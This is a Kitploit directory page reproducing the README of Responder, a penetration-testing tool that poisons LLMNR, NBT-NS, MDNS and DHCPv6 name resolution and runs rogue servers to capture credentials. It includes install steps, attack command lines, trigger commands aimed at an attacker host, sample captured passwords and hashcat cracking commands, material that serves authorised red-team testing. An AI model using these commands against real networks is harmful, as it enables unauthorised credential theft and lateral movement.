Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Responder — Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. | Kitploit
Tools/GitHubGitHub/lgandx/responder
Password CrackingReconnaissancePassword AttacksDNS & Subdomain EnumerationExploitationLateral MovementInformation GatheringNetwork SecurityPenetration TestingAuthenticationDNS FuzzingRed Teaming
6.5k8671233 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
DNS Analysis
Top in Lateral Movement #7
Top in Password Attacks #8
Top in Password Cracking #6
GitHublgandx/responder

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

View Repository

Responder

Python Version License

Responder is a LLMNR, NBT-NS, and MDNS poisoner with built-in rogue authentication servers for HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, and more. It supports NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP, and various authentication methods across 15+ protocols.


Table of Contents

  • Overview
  • What's New
  • Installation
  • Quick Start
  • Network Poisoning
  • Rogue Servers
  • Configuration
  • macOS
  • Troubleshooting

Overview

Responder captures credentials by responding to LLMNR, NBT-NS, and MDNS name resolution requests. When a client attempts to resolve a non-existent hostname, Responder answers, directing the client to the attacker's machine where multiple rogue authentication servers capture credentials. DHCP, DHCPv6 rogue servers are also included and can be enabled separately.

Captured Data:

  • NetNTLMv1/v2 hashes - Crackable with hashcat/john
  • Kerberos AS-REQ hashes - Offline cracking (hashcat -m 7500)
  • Cleartext credentials - HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-response - CRAM-MD5, DIGEST-MD5

What's New

This version includes:

DHCPv6 & DNS Enhancements

  • ✅ DHCPv6 INFORMATION-REQUEST - Full Windows 10/11 compatibility
  • ✅ Domain Filtering - Target specific domains (DHCPv6 & DNS)
  • ✅ Router Advertisements - Optional IPv6 network poisoning

Email Server Upgrades

  • ✅ SMTP STARTTLS - Capture from modern email clients
  • ✅ IMAP STARTTLS - Port 143 with TLS upgrade
  • ✅ IMAPS - Native SSL on port 993
  • ✅ Enhanced POP3 - Better compatibility

Kerberos Improvements

  • ✅ Force AS-REQ - Force kerberos authentication.
  • ✅ Attempt NTLM Fallback - After grabbing kerberos auth, return KDC_ERR_ETYPE_NOSUPP

Protocol Enhancements

  • ✅ MSSQL - SQL Server authentication capture
  • ✅ LDAP/LDAPS - Directory service credentials
  • ✅ RDP - Remote Desktop authentication
  • ✅ WinRM - Windows Remote Management
  • ✅ DCERPC - Windows RPC authentication

Installation

Requirements

  • Python 2.7 or Python 3.x
  • Linux (Ubuntu, Kali, Debian recommended)
  • Root privileges

System Dependencies

sudo apt-get update
sudo apt-get install python3 python3-pip python3-netifaces

Install Responder

git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Verify Installation

sudo python3 Responder.py --help

Quick Start

Basic Poisoning

# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 Attack

# Edit Responder.conf first:
# [DHCPv6 Server]
# DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

Force HTTP Basic Auth

sudo python3 Responder.py -I eth0 -b -v

Enable Proxy Auth + Rogue DHCP

# Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)
sudo python3 Responder.py -I eth0 -Pvd

Network Poisoning

LLMNR/NBT-NS/MDNS Poisoning

Purpose: Respond to name resolution failures

How it works:

  1. Client broadcasts query for non-existent host
  2. Responder answers: "I'm that host"
  3. Client connects to attacker
  4. Credentials captured

Configuration:

[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Usage:

sudo python3 Responder.py -I eth0 -v

DHCPv6 Server

Purpose: Force clients to use attacker's DNS via IPv6

Features:

  • ✅ INFORMATION-REQUEST support (Windows 10/11)
  • ✅ SOLICIT/REQUEST support
  • ✅ Domain filtering (surgical targeting)
  • ✅ Router Advertisement (optional)

How it works:

  1. Windows sends DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
  2. Responder responds: DNS = attacker IPv6
  3. Windows prioritizes IPv6 DNS
  4. All DNS queries → attacker
  5. DNS poisoning → credential capture

Configuration:

[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Usage:

sudo python3 Responder.py -I eth0 --dhcpv6 -v

Expected Output:

[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Rogue Servers

Responder includes 17+ rogue authentication servers:

File & Network Services

SMB Server (Ports 445, 139)

Purpose: Capture NetNTLM hashes from file shares

Features:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 hash capture
  • ✅ Extended Security NTLMSSP
  • ✅ Session signing disabled (allows relay)

Triggers:

# UNC paths
\\attacker-ip\share
\\non-existent-server\files

# NET USE commands
net use \\attacker-ip\share

# Windows Explorer address bar
\\attacker-ip\

Captured Format:

username::domain:challenge:response:blob

Cracking:

hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

Configuration:

[Responder Core]
SMB = On

FTP Server (Port 21)

Purpose: Capture cleartext FTP credentials

Features:

  • ✅ Anonymous login honeypot
  • ✅ USER/PASS authentication
  • ✅ Cleartext credential capture

Triggers:

ftp attacker-ip
# Username: anything
# Password: anything

Captured Format:

[FTP] Cleartext: username:password

Configuration:

[Responder Core]
FTP = On

Database Servers

MSSQL Server (Port 1433)

Purpose: Capture Microsoft SQL Server authentication

Features:

  • ✅ SQL Server authentication
  • ✅ Windows authentication (NTLM)
  • ✅ Cleartext SQL credentials
  • ✅ NetNTLMv2 hash capture

Triggers:

-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Captured Formats:

[MSSQL] SQL Auth: sa:password123
[MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

Configuration:

[Responder Core]
SQL = On

Notes:

  • Captures both SQL authentication and Windows authentication
  • Works with SSMS, sqlcmd, ADO.NET connections
  • Can capture domain credentials via Windows auth

Email Servers

SMTP Server (Port 25, 587)

Purpose: Capture email client authentication

Features:

  • ✅ STARTTLS support (modern clients)
  • ✅ AUTH PLAIN (cleartext)
  • ✅ AUTH LOGIN (cleartext)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

STARTTLS Flow:

Client → EHLO
Server → 250-STARTTLS
Client → STARTTLS
Server → 220 Ready to start TLS
[TLS handshake using self-signed cert]
Client → AUTH PLAIN <credentials>
Server → Captured! ✅

Triggers:

Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

Captured Formats:

[SMTP] LOGIN: [email protected]:Password123
[SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob
[SMTP] CRAM-MD5: user:challenge:response

Configuration:

[Responder Core]
SMTP = On

Certificate Warnings: Self-signed cert warnings are normal. Clients reject first attempt, retry, and succeed. Credentials still captured.


IMAP Server (Port 143)

Download Tool